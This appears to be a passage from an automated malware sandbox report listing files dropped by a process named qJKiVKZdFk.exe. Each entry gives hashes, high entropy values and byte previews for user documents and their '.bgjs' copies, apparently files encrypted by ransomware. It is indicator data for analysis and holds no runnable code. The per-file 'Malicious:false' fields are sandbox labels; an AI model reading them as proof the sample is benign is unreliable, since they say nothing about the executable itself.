                                                                                                                                      Preview:NYMMP-G..I2..D]T..#..Z.V9B......}.m.+..}..Fq...o."........>y.......j.;..]X.3....u.+...qH..Pm.m.!w<.e...p..lLG.sr.....>0p..[.I:.^H.z...:.5..N......)....q........./..!.}7..].!...|f..........~..[...._)i...K$.VV....+.(.U.....=..O%..X.Y2.).b..wK..K.&..6/......R.0.G..!....;.2..ln.......g.......1N...eH{.o.]...0..:4E../....A.4.\/..F#k..M|.._Q.f6....J..!v.....{.PQ..[.(.% .;w......0.qb...I.83...R...w:b.u...U.i2j.P..e..-C.`O......W......z..`]...*...,...D...lE...._..._..W...;..L&o..p...(.n....mo..#.$.W..N..o..G..].....S..BF..C.V..\:%='..-.Q....W..+..h.."hD...A) .].0.....\.}D....r.....egk......\.2....... .....QcS...Pt.~D.>..:..9..80F....zs.%......##..$A..fY...|5|..1...5;..U..pKx.l..."t.V{f.--C=3.T..=m(...~1S.U#..w^"#..3.&F..X...UC.-..D...........L.A....#W........x....Bj..>..{.SiOel.}..>\.....w.;....N$l..u.(.-...n..5.8.}........:...c..?(...f...K..9C.".f......gB(|..?y...l...f.w../XP.~o..H...67r._...o2P.RR.G...........W;.y.Dm.I.^2.M.=.S*..t@.o......y

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.85056738515735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:U1uWn3BixMLUohT9urAJFXnKhfJIfdiwajWAvbAXtH9SIXNE64SuSzAbD:U1ufyU8JUCXnKhfu8JjzAXtHkCNF4dSu
                                                                                                                                      MD5:E7AC3939C07EDB8F30582AFA802A65CE
                                                                                                                                      SHA1:CB846EFD1DFE7EB774D797530C0DA3F4B593AB04
                                                                                                                                      SHA-256:22CF37A342D439BD0610814BED7E2F4418EF45700BBC3C30AEDEC38CCF2A8D7F
                                                                                                                                      SHA-512:5E72C9F7A7D04CFE8DE66C5FFEBF2D8CCEC86ADEEA13423DAC101D80520B1F6FD5CB4DAF548999D0157BFB648EE749EABBA63C1608042D8A2E045BB2D2EA772A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP-G..I2..D]T..#..Z.V9B......}.m.+..}..Fq...o."........>y.......j.;..]X.3....u.+...qH..Pm.m.!w<.e...p..lLG.sr.....>0p..[.I:.^H.z...:.5..N......)....q........./..!.}7..].!...|f..........~..[...._)i...K$.VV....+.(.U.....=..O%..X.Y2.).b..wK..K.&..6/......R.0.G..!....;.2..ln.......g.......1N...eH{.o.]...0..:4E../....A.4.\/..F#k..M|.._Q.f6....J..!v.....{.PQ..[.(.% .;w......0.qb...I.83...R...w:b.u...U.i2j.P..e..-C.`O......W......z..`]...*...,...D...lE...._..._..W...;..L&o..p...(.n....mo..#.$.W..N..o..G..].....S..BF..C.V..\:%='..-.Q....W..+..h.."hD...A) .].0.....\.}D....r.....egk......\.2....... .....QcS...Pt.~D.>..:..9..80F....zs.%......##..$A..fY...|5|..1...5;..U..pKx.l..."t.V{f.--C=3.T..=m(...~1S.U#..w^"#..3.&F..X...UC.-..D...........L.A....#W........x....Bj..>..{.SiOel.}..>\.....w.;....N$l..u.(.-...n..5.8.}........:...c..?(...f...K..9C.".f......gB(|..?y...l...f.w../XP.~o..H...67r._...o2P.RR.G...........W;.y.Dm.I.^2.M.=.S*..t@.o......y

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.862912115343528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PuTQ5Tsg7NfN9KwuApN0Z/w7srGwXMHhWatc2VbQNgVply0X83Hn3XlRQw2bD:55ogtu0Nm/wwqw6UabZVnnX83Hn/QwkD
                                                                                                                                      MD5:F66601EA9DA3F8BE51181518B8C715A7
                                                                                                                                      SHA1:8AA990DD9CD030690A88DA38C47A04872227BBD4
                                                                                                                                      SHA-256:2B1075CD6657AAD25502A3FF613369A87CB5A959715E0ED09F55036183CD5409
                                                                                                                                      SHA-512:2D0C575E6A33746E3E12F7BAB8AECE9D0B36255B0853C903E151574024DCA3CC468574B373D3BED3C07922A10B4423DE54542E67251E304909C087545694885D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP.g.C.[....ft%..k...lYv..y-H.!..p.......VbN.....ie. .v..{..@.r..6..... ...x...........w..%.......{...........n....^\...#...i7...Q..>..zLH.l[.r.B.Q.........rG.....@..J/. .oX.5...2..Y..a.........^..G.....d...PL.e..o.MJ..bNa........a\)/.i.."b...+.@J.{.z.<..I.}.r.0.>..@.U.>..D...C...28..b...P3..]@y..D.5Y..z.E...- .%A.y.Q_a.V.%!..hT..k...\....q1....=....d{../..G!..N.5.....Yt,s!.*B..s.~....[.......F.d.X^.S..F..u.q............YzK.gf......B1\R....+...?.7.K}M.[...."...@.,..Q....1.}....*..lzF..S...k.../.!^H.....'nv....GA.b.W..mO.k1.7.K..<.B..-..a\.A...5ia%.!.`.>.W........_$n...I-...y.._..WzB.......;..#.[02d$$.c!.".....T.....0U...c.e}.0u.;...Q......A.?..Qu.F{.....@D.....XQT..G..6j.L........)<..tR,3.n..X..Z.+y.......k..J.zRmV.R......^v..[...._....%...Vzt...Z.z. ...O......._....3Q.....o..g$.JFQp......}#.....n...Z1`|E%....3.........^..S.e..'..N.Y........X....3G.'...T.>. .$.........z..........K...$.....XU'j..M._..q....'..L..N9.i.QK?..`g.....L..,.

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.862912115343528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PuTQ5Tsg7NfN9KwuApN0Z/w7srGwXMHhWatc2VbQNgVply0X83Hn3XlRQw2bD:55ogtu0Nm/wwqw6UabZVnnX83Hn/QwkD
                                                                                                                                      MD5:F66601EA9DA3F8BE51181518B8C715A7
                                                                                                                                      SHA1:8AA990DD9CD030690A88DA38C47A04872227BBD4
                                                                                                                                      SHA-256:2B1075CD6657AAD25502A3FF613369A87CB5A959715E0ED09F55036183CD5409
                                                                                                                                      SHA-512:2D0C575E6A33746E3E12F7BAB8AECE9D0B36255B0853C903E151574024DCA3CC468574B373D3BED3C07922A10B4423DE54542E67251E304909C087545694885D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP.g.C.[....ft%..k...lYv..y-H.!..p.......VbN.....ie. .v..{..@.r..6..... ...x...........w..%.......{...........n....^\...#...i7...Q..>..zLH.l[.r.B.Q.........rG.....@..J/. .oX.5...2..Y..a.........^..G.....d...PL.e..o.MJ..bNa........a\)/.i.."b...+.@J.{.z.<..I.}.r.0.>..@.U.>..D...C...28..b...P3..]@y..D.5Y..z.E...- .%A.y.Q_a.V.%!..hT..k...\....q1....=....d{../..G!..N.5.....Yt,s!.*B..s.~....[.......F.d.X^.S..F..u.q............YzK.gf......B1\R....+...?.7.K}M.[...."...@.,..Q....1.}....*..lzF..S...k.../.!^H.....'nv....GA.b.W..mO.k1.7.K..<.B..-..a\.A...5ia%.!.`.>.W........_$n...I-...y.._..WzB.......;..#.[02d$$.c!.".....T.....0U...c.e}.0u.;...Q......A.?..Qu.F{.....@D.....XQT..G..6j.L........)<..tR,3.n..X..Z.+y.......k..J.zRmV.R......^v..[...._....%...Vzt...Z.z. ...O......._....3Q.....o..g$.JFQp......}#.....n...Z1`|E%....3.........^..S.e..'..N.Y........X....3G.'...T.>. .$.........z..........K...$.....XU'j..M._..q....'..L..N9.i.QK?..`g.....L..,.

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84506658129926
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IgqLvcxdV7kndtFk0pVjF540FpE6HefW+hDE2WlYz81vfGpph9Cf4hB3FLPjp2I1:rqLUzVgnddVjF5ZjTHeOeE2WY0uVXVzf
                                                                                                                                      MD5:7EBA174AA1DAFCCAE4848E02FCBA294C
                                                                                                                                      SHA1:2E3D6C49B56E2158D6E5CC5D1F851EB8EEBD46F7
                                                                                                                                      SHA-256:433527FD8DD558CFAAFCB37D331B41FFA603CB51800C33C8AC12BE728AE7FFDA
                                                                                                                                      SHA-512:92620A4A8982E344B8372029FA4B0EE0F96260C5EF5C6CDED1EB2BD385EBDF9237AF72B107BA49F4B4D6527CA9E67CA13D1EE1A3E0333CC74D3158EB92DD50D0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL......!.o-.v/..}.e..b4_L...P.,Rz.....g...X........(...D..$..[F.O..........t.v....f6.....v..)n\.ZW....*c.)`.F....t%...l=C.P....ey<.w8 .A..`.`.F6.>.s.m...+".....W....!..~.. ..ops2e.U...+>.{3[..h.tc.+..9._........U&..=..Y9...d.o!)....w.`<z......13.Y5bH.u....N ..4.......2q...[.7..f#...YNW.......vT..<.J.......7....M...#'.>.n.X..k......0..O,1^P~Q.K......s8.0...!;.Xtx../.j..$z.d.!0G.g1}.i....)......c..*.&...[aK7'.Y_.c.......0...v.?&wu.p9..F,_.F..O..j..a(....[.B....8....6.1.y.i...p..]TO..yj..3....$9n.x...cKp..A..&...i...(.....n.d....t...E.....:...d.m.HF.%O....06.bRC.v..Pou.'%.r#.+...=n.s'}..K.PC.......O....Ywo..xY<Jx./...+.(=CS.!R..1_.j.D.g......O..u~....Y......SN.F.....\O.nCQ.......(.:..T..Ns...7G.6.....b..u..nW'.q...P.........PR.&T"...!...U..c..a....}.2..F........g...wa...X,...(..L&.ZC...%.....B+..lY.........U..&.R(g.^..B;.../..J.HU...;>......!.OG.}q.$....+....h[...%.m.p..>......1..*G......7h.:f.e...`*5.%MG..c.(#....1..z.7..Q.Z;.&m!

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84506658129926
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IgqLvcxdV7kndtFk0pVjF540FpE6HefW+hDE2WlYz81vfGpph9Cf4hB3FLPjp2I1:rqLUzVgnddVjF5ZjTHeOeE2WY0uVXVzf
                                                                                                                                      MD5:7EBA174AA1DAFCCAE4848E02FCBA294C
                                                                                                                                      SHA1:2E3D6C49B56E2158D6E5CC5D1F851EB8EEBD46F7
                                                                                                                                      SHA-256:433527FD8DD558CFAAFCB37D331B41FFA603CB51800C33C8AC12BE728AE7FFDA
                                                                                                                                      SHA-512:92620A4A8982E344B8372029FA4B0EE0F96260C5EF5C6CDED1EB2BD385EBDF9237AF72B107BA49F4B4D6527CA9E67CA13D1EE1A3E0333CC74D3158EB92DD50D0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL......!.o-.v/..}.e..b4_L...P.,Rz.....g...X........(...D..$..[F.O..........t.v....f6.....v..)n\.ZW....*c.)`.F....t%...l=C.P....ey<.w8 .A..`.`.F6.>.s.m...+".....W....!..~.. ..ops2e.U...+>.{3[..h.tc.+..9._........U&..=..Y9...d.o!)....w.`<z......13.Y5bH.u....N ..4.......2q...[.7..f#...YNW.......vT..<.J.......7....M...#'.>.n.X..k......0..O,1^P~Q.K......s8.0...!;.Xtx../.j..$z.d.!0G.g1}.i....)......c..*.&...[aK7'.Y_.c.......0...v.?&wu.p9..F,_.F..O..j..a(....[.B....8....6.1.y.i...p..]TO..yj..3....$9n.x...cKp..A..&...i...(.....n.d....t...E.....:...d.m.HF.%O....06.bRC.v..Pou.'%.r#.+...=n.s'}..K.PC.......O....Ywo..xY<Jx./...+.(=CS.!R..1_.j.D.g......O..u~....Y......SN.F.....\O.nCQ.......(.:..T..Ns...7G.6.....b..u..nW'.q...P.........PR.&T"...!...U..c..a....}.2..F........g...wa...X,...(..L&.ZC...%.....B+..lY.........U..&.R(g.^..B;.../..J.HU...;>......!.OG.}q.$....+....h[...%.m.p..>......1..*G......7h.:f.e...`*5.%MG..c.(#....1..z.7..Q.Z;.&m!

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.833890404915806
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:d4L9MWOysy+3yAPceHbfsc6LwewNqQ8q19MFJkteJIROQlA2FLjJN2WiamnBPXbD:dgSnygJceHbfscsM8q19MvJIBbUBD
                                                                                                                                      MD5:195241F02B4DA4DA9B08958C06381AB1
                                                                                                                                      SHA1:65215BB0FCF931B0B40F75846BF0187FF9BEFBE2
                                                                                                                                      SHA-256:6BD991673B3ED2CBC2D5265DF08D27F34A4D7C31EF05F6EDD6716E714A9AFBBB
                                                                                                                                      SHA-512:424AE6CAB2B609040992C083FC4BB6D46F9A41DC168A319F182E725DDF90A2EE472D412937233E082F65653C6C52EA838BE77F365B2EFFEAC71DC601C23E7E1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS.(...%....;'c....=...7.H(.).@..X.(.....3.....)..t3..~.o.M,....."m$c.}.[..!..aH...F.^...s.n....".rd...Yw..P`.D+=A.m].s&.k..y..X.v9..........[}c..Afq..(.AfOm..w..=,.!......184./)TW.-..b8./.6f0.`.~...4.E....ev&Fm..{.......R.gF...N......:ZT..Q...pS......\@Q.!.BL.#$...,....M..y...Je...E!...).......I.z.Gur..F.w.....P..P..K...\..ms+....C."..QX!........,-...veq...b...N..N...<W.5.,..VU. "..w.R.....f(.|..............<..3.S.a07"...w.V..c=j1@....J..L4....Q..H*....A..Zm.e..wCk....Q...PA......W...V..%....uK........{.'.K...r.(.. h..3..1T....v..j.|..e.9)..f...N,.f?}..?.......N......"..Y.Uz.QI:?c.CZP\.......OgF20..( .0.W.8Y2.f.6..*t....HJMm.Zl.z.(.m.......LV.j........^..u.6I|e.|....R)......5..p.$...kB.l...7N1......\!...........y.<.B..XU6...`.<. k.. ..(...a..A.b_>.=.R..8..|N.R..=2=.?e.<..rs..H.^)....hP?.8T:P.aw.TK.,..2*.f.s]..m...V5/|/..n.cgD....1*.z6C.....wTqS`...|3....a..eo..3...35.|..\..._...F..c.......!2.~.+u.&i`M.....V.$..!'...D. ...J?0.^.V0e...

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.833890404915806
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:d4L9MWOysy+3yAPceHbfsc6LwewNqQ8q19MFJkteJIROQlA2FLjJN2WiamnBPXbD:dgSnygJceHbfscsM8q19MvJIBbUBD
                                                                                                                                      MD5:195241F02B4DA4DA9B08958C06381AB1
                                                                                                                                      SHA1:65215BB0FCF931B0B40F75846BF0187FF9BEFBE2
                                                                                                                                      SHA-256:6BD991673B3ED2CBC2D5265DF08D27F34A4D7C31EF05F6EDD6716E714A9AFBBB
                                                                                                                                      SHA-512:424AE6CAB2B609040992C083FC4BB6D46F9A41DC168A319F182E725DDF90A2EE472D412937233E082F65653C6C52EA838BE77F365B2EFFEAC71DC601C23E7E1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS.(...%....;'c....=...7.H(.).@..X.(.....3.....)..t3..~.o.M,....."m$c.}.[..!..aH...F.^...s.n....".rd...Yw..P`.D+=A.m].s&.k..y..X.v9..........[}c..Afq..(.AfOm..w..=,.!......184./)TW.-..b8./.6f0.`.~...4.E....ev&Fm..{.......R.gF...N......:ZT..Q...pS......\@Q.!.BL.#$...,....M..y...Je...E!...).......I.z.Gur..F.w.....P..P..K...\..ms+....C."..QX!........,-...veq...b...N..N...<W.5.,..VU. "..w.R.....f(.|..............<..3.S.a07"...w.V..c=j1@....J..L4....Q..H*....A..Zm.e..wCk....Q...PA......W...V..%....uK........{.'.K...r.(.. h..3..1T....v..j.|..e.9)..f...N,.f?}..?.......N......"..Y.Uz.QI:?c.CZP\.......OgF20..( .0.W.8Y2.f.6..*t....HJMm.Zl.z.(.m.......LV.j........^..u.6I|e.|....R)......5..p.$...kB.l...7N1......\!...........y.<.B..XU6...`.<. k.. ..(...a..A.b_>.=.R..8..|N.R..=2=.?e.<..rs..H.^)....hP?.8T:P.aw.TK.,..2*.f.s]..m...V5/|/..n.cgD....1*.z6C.....wTqS`...|3....a..eo..3...35.|..\..._...F..c.......!2.~.+u.&i`M.....V.$..!'...D. ...J?0.^.V0e...

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.840617543824181
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:n17yQBQZoaUW57eg7ewA0NRYbGB61hjy+ogOcKs6bgC6/R7D6ZyK02SZbD:n1lSGaUWteJL0fYbGB2hxogO1g5J7fzX
                                                                                                                                      MD5:8948FEA2DA8EA12096D391F58D61C0A9
                                                                                                                                      SHA1:EE14E5CF9D7DD4D7ED70D348D23C4A28B9C254D7
                                                                                                                                      SHA-256:C45A7BB88D329D951F5010C7EA84DF7B8636ADF02D5A13B88414CC04C1FA9AE5
                                                                                                                                      SHA-512:5023AE323B4880D2483C62B238CEA47E8B08E9B9E7E19254AAC0432CFF0D9348FCA5E8B0721DF8259AA6681A5D7EBA57B5951984DA9128B30AF50FECCB1FE93D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD%v.....l@.m.....wxB...;.a..v2.F<...V.E..].l.R....s.s............aX........t..;..I.;.Yr.AL1."...........r..T..<mZ.G~....H....&.!.O...O..@v.b......L..[7....7._...?\.6=..{<....hC9.a...>t&5.X.<......a.H....:.O.#..5....q...-...[..x..[..4..,....hzg..tK>........].o..T......2.2...g...)'a......Y"J..o....p.=..=z....=Pi@....c..!.z3...w.Pp~6k^...N$.U!.[....n......~..|...#.i.%a.#..H.%...v.zx%.{..~.lj7.5.+...H`.2O.cvC.q.{..?...uI..I.R.J~6..N.8..;P..=H.......x.O.6fh"p..._C.lg...b...W..;q..g[.~<IAV=...N@.*RY3.,...<...i..d...y.p..m...c..)...$N.!.m.l...UE.LwE2*\s...7..0...9G7..#..z......V.F.rR... 2n}.]jX.....VXJ..T|....D..w..X-.Z..,..Kao..^|Z...B6.4....D..G.q...i&.=.~l..v...G.>_w;..........~..aT.)[.....ds9.I...D.JN.).K.h.B.s.....3MB.$..=..[....."..#._.~.v.o.s:G.....'.D......LiO..mb...n=m.y].w.....|...^H..j.Y..k...H... ......z....z.....8..p&.m.F.....W.~.Y4z,..k.<..Y.h=...'91.m`..^.\.J.....V|B..*....@,K.F.2%.Ix.%........>.t.3.Z1Ib=....0.%._......~....k.-.-..6<.

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.840617543824181
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:n17yQBQZoaUW57eg7ewA0NRYbGB61hjy+ogOcKs6bgC6/R7D6ZyK02SZbD:n1lSGaUWteJL0fYbGB2hxogO1g5J7fzX
                                                                                                                                      MD5:8948FEA2DA8EA12096D391F58D61C0A9
                                                                                                                                      SHA1:EE14E5CF9D7DD4D7ED70D348D23C4A28B9C254D7
                                                                                                                                      SHA-256:C45A7BB88D329D951F5010C7EA84DF7B8636ADF02D5A13B88414CC04C1FA9AE5
                                                                                                                                      SHA-512:5023AE323B4880D2483C62B238CEA47E8B08E9B9E7E19254AAC0432CFF0D9348FCA5E8B0721DF8259AA6681A5D7EBA57B5951984DA9128B30AF50FECCB1FE93D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD%v.....l@.m.....wxB...;.a..v2.F<...V.E..].l.R....s.s............aX........t..;..I.;.Yr.AL1."...........r..T..<mZ.G~....H....&.!.O...O..@v.b......L..[7....7._...?\.6=..{<....hC9.a...>t&5.X.<......a.H....:.O.#..5....q...-...[..x..[..4..,....hzg..tK>........].o..T......2.2...g...)'a......Y"J..o....p.=..=z....=Pi@....c..!.z3...w.Pp~6k^...N$.U!.[....n......~..|...#.i.%a.#..H.%...v.zx%.{..~.lj7.5.+...H`.2O.cvC.q.{..?...uI..I.R.J~6..N.8..;P..=H.......x.O.6fh"p..._C.lg...b...W..;q..g[.~<IAV=...N@.*RY3.,...<...i..d...y.p..m...c..)...$N.!.m.l...UE.LwE2*\s...7..0...9G7..#..z......V.F.rR... 2n}.]jX.....VXJ..T|....D..w..X-.Z..,..Kao..^|Z...B6.4....D..G.q...i&.=.~l..v...G.>_w;..........~..aT.)[.....ds9.I...D.JN.).K.h.B.s.....3MB.$..=..[....."..#._.~.v.o.s:G.....'.D......LiO..mb...n=m.y].w.....|...^H..j.Y..k...H... ......z....z.....8..p&.m.F.....W.~.Y4z,..k.<..Y.h=...'91.m`..^.\.J.....V|B..*....@,K.F.2%.Ix.%........>.t.3.Z1Ib=....0.%._......~....k.-.-..6<.

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8591686078983125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AVgDYaPbU26gRoIup8oB2JuI1LKf+YG+Zi75PcJNyMHY+tJbD:GOT/6gRoIToEcI1SZlHhVpD
                                                                                                                                      MD5:E1199EE2A0222DD56B8E49C39D4C5A1D
                                                                                                                                      SHA1:3FD45997F99E6199F9F44B55B821649EF944B6C2
                                                                                                                                      SHA-256:42A0D3CBB77F257DD5AC6CE2C42B85CFD1EE377F906D36B473601ECDD3A738C2
                                                                                                                                      SHA-512:F71F63DD7DEA9D0030936B134E35AA21C82EA4AA3114B77398CE94880AC9A4CFAAE00F38AA7114982681DE43A8D4B60A8761D2D437474EAB19BDC02CE223DF81
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB..fo.2..'. ..F.|....qldT.I..%.~(p.J.v....g.#..w..L$6...W.......:...|R...w_N..!#..X..H......'..m#..s...'J.J...G....b2.C....*0...T..e[...>....><...?. .(.c....2..+0..7...S..as2.<.5...'..]...r?.3...C..O....:..n|.Ij.FB...:5......;...B..}.n....$.]g.....RA...M.\).;+..../.!EMr.....`...Z5.k.. @..C.....Y.A......h.K?z..I.`..\~:...'xm..z7M.@h..5.3.....:..~..'.".AMT.e.*..V..*.i/.....%V...I.e.xegV..C%._..A,...Y............m.n..?IB.&.];......0..../%.z.d@.8..,......]b'Z....;>T....j3.Z........o.- ....P`....i{s..._.^.....6"..>...z1.5z..g'2..S..d.#}..5P_?]......S..G6.n>.A.VE...:.=..Rx]..%.k....a.P.wwNM.f....~.H ......!..R/.3H...v.d.A..~c.......J.R\..?.O*~..|.~.b...x..H..#..3w*2M.V..O..<$....lm.d9..:.....(..2...XW7zP.j.#].E.Z,.sc^(...... .>>.5{...-.g..X.4E.J:W....j.".;G.p}..]0.H..\F..p*J...2.w.!/q.....f.6..}*Gq.q.x*`........<.(!.o...k...+4.N^W5....,..5&..$Ib..+.]L.....:|F..>.f...2.-...E5n.m. 3x:CK...y...3...bX....V7l........^|C.r..f{>..8Yt#..6.f?......&

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8591686078983125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AVgDYaPbU26gRoIup8oB2JuI1LKf+YG+Zi75PcJNyMHY+tJbD:GOT/6gRoIToEcI1SZlHhVpD
                                                                                                                                      MD5:E1199EE2A0222DD56B8E49C39D4C5A1D
                                                                                                                                      SHA1:3FD45997F99E6199F9F44B55B821649EF944B6C2
                                                                                                                                      SHA-256:42A0D3CBB77F257DD5AC6CE2C42B85CFD1EE377F906D36B473601ECDD3A738C2
                                                                                                                                      SHA-512:F71F63DD7DEA9D0030936B134E35AA21C82EA4AA3114B77398CE94880AC9A4CFAAE00F38AA7114982681DE43A8D4B60A8761D2D437474EAB19BDC02CE223DF81
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB..fo.2..'. ..F.|....qldT.I..%.~(p.J.v....g.#..w..L$6...W.......:...|R...w_N..!#..X..H......'..m#..s...'J.J...G....b2.C....*0...T..e[...>....><...?. .(.c....2..+0..7...S..as2.<.5...'..]...r?.3...C..O....:..n|.Ij.FB...:5......;...B..}.n....$.]g.....RA...M.\).;+..../.!EMr.....`...Z5.k.. @..C.....Y.A......h.K?z..I.`..\~:...'xm..z7M.@h..5.3.....:..~..'.".AMT.e.*..V..*.i/.....%V...I.e.xegV..C%._..A,...Y............m.n..?IB.&.];......0..../%.z.d@.8..,......]b'Z....;>T....j3.Z........o.- ....P`....i{s..._.^.....6"..>...z1.5z..g'2..S..d.#}..5P_?]......S..G6.n>.A.VE...:.=..Rx]..%.k....a.P.wwNM.f....~.H ......!..R/.3H...v.d.A..~c.......J.R\..?.O*~..|.~.b...x..H..#..3w*2M.V..O..<$....lm.d9..:.....(..2...XW7zP.j.#].E.Z,.sc^(...... .>>.5{...-.g..X.4E.J:W....j.".;G.p}..]0.H..\F..p*J...2.w.!/q.....f.6..}*Gq.q.x*`........<.(!.o...k...+4.N^W5....,..5&..$Ib..+.]L.....:|F..>.f...2.-...E5n.m. 3x:CK...y...3...bX....V7l........^|C.r..f{>..8Yt#..6.f?......&

                                                                                                                                      C:\Users\user\Documents\QCOILOQIKC\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843758453620388
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kVRnfU9OzdMSYfY4zXSaz1stIFvPUXljubzCbzhoRe0yFPbD:UfUAxMSYw4zXSaz1sehP6ibzMVkexFTD
                                                                                                                                      MD5:8C02DCC05834A3BB57EF6172510D8EE5
                                                                                                                                      SHA1:172BD268C2EFE29C1FD380962DD37209B5222C4C
                                                                                                                                      SHA-256:9E22F90A64E4121AB1EEF724CC9EAB786837ACD4A69211F471F2E1D01B390E64
                                                                                                                                      SHA-512:093F0DBC16D78DE5E6CB6D4C77D40CE5DC9E32315F5B3ED4D2D70D6A4AA9FCF07385CA7CA9700E17F6802A2F0B7462B6E942471EF00C0121A7F3EE8E2F54727D
                                                                                                                                      Malicious:false
